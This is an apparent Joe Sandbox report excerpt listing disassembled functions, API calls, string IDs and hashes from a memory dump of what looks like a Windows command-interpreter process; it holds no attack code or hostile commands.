                                                      • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                      • API String ID: 1388555566-2647954630
                                                      • Opcode ID: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                      • Instruction ID: e9719496577a3cf59c84c333d1f5afbffe0d51d99cd6fe2b465abcbf5720b4c9
                                                      • Opcode Fuzzy Hash: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                      • Instruction Fuzzy Hash: 80A2A671E08B8296EB14EB25E4063B9F7A1FB49745F848236DA0E87794DFBCE404C712
                                                      Function 00007FF7E1DBE680 Relevance: 79.4, APIs: 39, Strings: 6, Instructions: 696COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                      • String ID: &<|>$+: $:$:EOF$=,;$^
                                                      • API String ID: 511550188-726566285
                                                      • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                      • Instruction ID: 5602147798342c19a277fde28cc6eb7f2de45df1362b423825bc3f769b903aa8
                                                      • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                      • Instruction Fuzzy Hash: D7520422E0C69296EB24EB159402779EAA5FF49741FC88537DA0F43794DFBCE840C762
                                                      Function 00007FF7E1DB9E50 Relevance: 67.3, APIs: 32, Strings: 6, Instructions: 812COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: _wcsnicmp$wcschr$wcstol
                                                      • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                      • API String ID: 1738779099-3004636944
                                                      • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                      • Instruction ID: a9e43ad1bb1664594fd9f0dddbca34ff0cd55b3ae89f3af7f9d8098861a926c3
                                                      • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                      • Instruction Fuzzy Hash: CD729031F0865296EB14EF659046BBDB7A1FB44B88FC08036CE0E57784DEBCA815C362
                                                      Function 00007FF7E1DD7F00 Relevance: 61.6, APIs: 28, Strings: 7, Instructions: 341memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD7F44
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DD7F5C
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD7F9E
                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD7FFF
                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8020
                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8036
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8061
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD8075
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD80D6
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD80EA
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD8177
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD819A
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD81BD
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD81DC
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD81FB
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD821A
                                                      • _wcsnicmp.MSVCRT ref: 00007FF7E1DD8239
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8291
                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD82D7
                                                      • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD82FB
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD831A
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8364
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD8378
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD839A
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD83AE
                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD83E6
                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8403
                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7E1DD8418
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                      • API String ID: 3637805771-3100821235
                                                      • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                      • Instruction ID: 50b8edd5e4967aa8ef46c3fbe87ce29722abfbdbb7da3e4a53c604d6d72cf0f7
                                                      • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                                      • Instruction Fuzzy Hash: 1DE1B371E08A528AE714EF65E401279FBA1FB89B95BC48236CD0E83794DFBCA454C721
                                                      Function 00007FF7E1DB3F90 Relevance: 60.8, APIs: 32, Strings: 2, Instructions: 1302fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                      • String ID: %s$%s
                                                      • API String ID: 3623545644-3518022669
                                                      • Opcode ID: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                      • Instruction ID: 8bb1bd6a818cec4f9da848e11d674401646a163ffa0b4eda29d8de4b4eb447a9
                                                      • Opcode Fuzzy Hash: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                      • Instruction Fuzzy Hash: BDD2A232A087829AEB64EF25D4427B9B7A1FB45748F80413BDA0E47B94DFBCE544C712
                                                      Function 00007FF7E1DB2C48 Relevance: 60.1, APIs: 32, Strings: 2, Instructions: 633COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                      • String ID: %9d$%s
                                                      • API String ID: 4286035211-3662383364
                                                      • Opcode ID: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                      • Instruction ID: 310cd20fc843730ea8b54c55e80d2109bbe191c022eafba9ef6a6570dc587a45
                                                      • Opcode Fuzzy Hash: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                      • Instruction Fuzzy Hash: 1852B232A08B829AEB24EB24D8517FDB7A0FB85759F804236DA0E47794DFBCE544C711
                                                      Function 00007FF7E1DC18D4 Relevance: 42.6, APIs: 23, Strings: 1, Instructions: 644COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcsrchr$towlower
                                                      • String ID: fdpnxsatz
                                                      • API String ID: 3267374428-1106894203
                                                      • Opcode ID: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                      • Instruction ID: dda824986c0ee362af044c50050bee28ad488c2ad7ca3904a18eac69d5de03fb
                                                      • Opcode Fuzzy Hash: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                      • Instruction Fuzzy Hash: 3142E032B08A92C5EB64EF25D9013B9A6A1FF45B90F848936DE0E57784DF7CE441C391
                                                      Function 00007FF7E1DB7650 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 461fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                      • String ID: DPATH
                                                      • API String ID: 95024817-2010427443
                                                      • Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                      • Instruction ID: d2b2fc0f614502a16793e8695fb2de72e3948192ca774fda0629f41a764c7a8c
                                                      • Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                      • Instruction Fuzzy Hash: A712E932A0868297EB25EF259441379F7A1FF89754F84523AEA4E53B94DF7CE400CB12
                                                      Function 00007FF7E1DB5240 Relevance: 33.8, APIs: 14, Strings: 5, Instructions: 503COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: [...]$ [..]$ [.]$...$:
                                                      • API String ID: 0-1980097535
                                                      • Opcode ID: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                      • Instruction ID: 2c0b49213b0ea372839dfc996fc151596e6cc1c3d587b621cd039270ea36e0ac
                                                      • Opcode Fuzzy Hash: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                      • Instruction Fuzzy Hash: 7832B072A0878396EB24EF25D8427F9B3A0EB45784FC18236DA0D47695DFBCE505C722
                                                      Function 00007FF7E1DB6EE4 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 342timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                      • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                      • API String ID: 1795611712-3662956551
                                                      • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                      • Instruction ID: e221b39cc7f47288ab9205f581d82e3da46226a49a7ba4837ed2038dd9771ab8
                                                      • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                      • Instruction Fuzzy Hash: A7E1C362E0C64296E711EB64A8427B9E7A1FF48784FC44233D90E87698DFBCE544C762
                                                      Function 00007FF7E1DDEE88 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 225COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcsupr.MSVCRT ref: 00007FF7E1DDEF33
                                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEF98
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEFA9
                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEFBF
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7E1DDEFDC
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDEFED
                                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF003
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF022
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF083
                                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF092
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF0A5
                                                      • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF7E1DDF0DB
                                                      • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF135
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF16C
                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7E1DDE964), ref: 00007FF7E1DDF185
                                                        • Part of subcall function 00007FF7E1DC01B8: _get_osfhandle.MSVCRT ref: 00007FF7E1DC01C4
                                                        • Part of subcall function 00007FF7E1DC01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7E1DCE904,?,?,?,?,00000000,00007FF7E1DC3491,?,?,?,00007FF7E1DD4420), ref: 00007FF7E1DC01D6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                      • String ID: <noalias>$CMD.EXE
                                                      • API String ID: 1161012917-1690691951
                                                      • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                      • Instruction ID: bc9efa534f7194d580a059115afa4fb9067c02078aa670097b56e4856e0557a9
                                                      • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                      • Instruction Fuzzy Hash: 74918422F0965296FB15FB70D4423BDBAA0AF49B59F848236DD0E43794DFBCA445C322
                                                      Function 00007FF7E1DB32B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC3578: _get_osfhandle.MSVCRT ref: 00007FF7E1DC3584
                                                        • Part of subcall function 00007FF7E1DC3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC359C
                                                        • Part of subcall function 00007FF7E1DC3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35C3
                                                        • Part of subcall function 00007FF7E1DC3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35D9
                                                        • Part of subcall function 00007FF7E1DC3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC35ED
                                                        • Part of subcall function 00007FF7E1DC3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7E1DB32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7E1DC3602
                                                      • _get_osfhandle.MSVCRT ref: 00007FF7E1DB32F3
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7E1DB32A4), ref: 00007FF7E1DB3309
                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7E1DB3384
                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7E1DD11DF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmpDownload File
